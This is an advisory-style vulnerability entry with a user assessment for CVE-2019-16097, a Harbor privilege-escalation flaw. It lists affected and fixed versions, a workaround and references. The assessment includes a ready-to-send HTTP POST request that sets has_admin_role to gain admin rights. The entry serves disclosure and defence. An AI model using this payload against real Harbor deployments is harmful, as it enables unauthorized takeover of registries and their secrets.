core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
Recent assessments:
kevthehermit at April 23, 2020 8:52pm UTC reported:
There are three specific requirements for an application to be vulnerable:
Vulnerable version !
Using a Database for storage
Self Registration enabled.
Self-registration is not a very common setting but it has been seen.
If you are able to register your own account it is trivial to modify a POST request and elevate yourself to admin permissions.
POST /api/users HTTP/1.1
Host: 10.102.7.190
Content-Type: application/json
Content-Length: 95
Connection: close
{"username":"Tom","email":"[email protected]","realname":"Tom","password":"Password1","comment":null, "has_admin_role":"true"}
If you have access to the repository as an admin you can manipulate the containers and even gain further access in to the network if you can read and or modify any of the cotanienrs or their secrets.
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 2
www.vmware.com/security/advisories/VMSA-2019-0015.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16097
github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517
github.com/goharbor/harbor/compare/v1.8.2...v1.9.0-rc1
github.com/goharbor/harbor/releases/tag/v1.7.6
github.com/goharbor/harbor/releases/tag/v1.8.3
unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097